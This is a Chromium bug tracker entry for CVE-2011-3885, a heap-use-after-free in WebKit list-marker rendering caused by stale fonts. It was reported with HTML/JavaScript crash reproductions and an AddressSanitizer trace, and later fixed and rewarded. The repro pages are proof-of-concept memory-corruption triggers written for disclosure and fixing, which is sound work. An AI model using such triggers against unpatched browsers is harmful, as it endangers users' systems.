Starred by 2 users
Status: Fixed
Closed: Oct 2011
OS: All
Pri: 1
Type: Bug-Security

More stale styles in listmarkers
Reported by infe...@chromium.org (Project Member), Sep 22 2011
credit: miaubiz

```html
<style>
li:before {
    content: "B";
}

@font-face { font-family: "A"; src: url(); }
body { font-family: A; }
</style>
  <li>C
  <ul>
  </ul>
<script>
document.body.offsetTop;
document.body.style.color = "blue";
</script>
```
Comment 2 by miau...@gmail.com, Sep 23 2011
I think these are the same, but just in case :D
Attachments: 27b.html (536 bytes), 19b.html (416 bytes)
Comment 3 by miau...@gmail.com, Sep 25 2011
first-letter instead of before. same thing.
Attachment: first-letter.html (150 bytes)
Thanks a lot Miaubiz for the additional testcases.

Mergedinto: 97994
Status: Duplicate
Mergedinto:
Status: Available
Reopening since the generic fix is not enough. There are certain cases where we can't delay font retirement, so we need to fix these security bugs along with the functional issue.

Comment #9 From mitz@webkit.org 2011-09-28 13:26:48 PST
I can see a recalcStyle(Force) taking place, with a brand new FontSelector, after the old FontSelector's document is cleared. So the issue remains that style recalc is not updating all renderers as it should. I can't think of a reasonable way to defer the font deletion in cases like this. We should just fix the style recalc bugs.
Comment 7 by miau...@gmail.com, Sep 29 2011
putting this repro here where I think it belongs
Attachments: crashing-sep29.html (609 bytes), asan.txt (12.3 KB)
Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: thanks for uncovering these list marker issues! $1000 for this one too.

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Comment 9 by miau...@gmail.com, Oct 3 2011
but it's not even fixed yet :|
Labels: -Mstone-14 Mstone-15
Oh balls. Looks like a mix up between myself and Inferno. Still, seems like it'll be good for the reward once we fix it :)
Comment 11 by miau...@gmail.com, Oct 4 2011
with vertical text orientation the stack changes

```text
==4561== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe38d050d at pc 0x7ffff3580ea2 bp 0x7fffffff69d0 sp 0x7fffffff68e0
READ of size 1 at 0x7fffe38d050d thread T0
    #0 0x7ffff3580ea2 in WebCore::InlineFlowBox::requiresIdeographicBaseline(WTF::HashMap<WebCore::InlineTextBox const*, std::pair<WTF::Vector<WebCore::SimpleFontData const*, 0ul>, WebCore::GlyphOverflow>, WTF::PtrHash<WebCore::InlineTextBox const*>, WTF::HashTraits<WebCore::InlineTextBox const*>, WTF::HashTraits<std::pair<WTF::Vector<WebCore::SimpleFontData const*, 0ul>, WebCore::GlyphOverflow> > > const&) const ???:0
```

```html
<html>
  <head>
    <style>
      li:before {
        content: "B";
      }
      @font-face { font-family:"A"; src: url(); }
      li { font-family: A;
        -webkit-writing-mode:vertical-lr;
      }
    </style>
    C
    <style></style>
  </head>
  <body><li><ul></ul></li></body>
</html>
<script>
  document.designMode='on';
  document.execCommand('selectall');
  document.execCommand('italic');
</script>
```


Attachments: asan1165.txt (11.3 KB), 1165.html (412 bytes)
Owner: infe...@chromium.org
Status: Started
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/97075
Labels: -Merge-Approved Merge-Merged merge-merged-874 SecImpacts-Stable SecImpacts-Beta
merged to m15 in r97086
Labels: CVE-2011-3885
Labels: -reward-unpaid
Payment in system, can take up to a couple of weeks.
Comment 17 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 18 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 19 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -Mstone-15 -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta Cr-Content Security-Impact-Beta Security-Severity-High Security-Impact-Stable M-15 Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 20 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 21 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 23 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 25 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 26 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 27 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 28 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 29 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 30 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic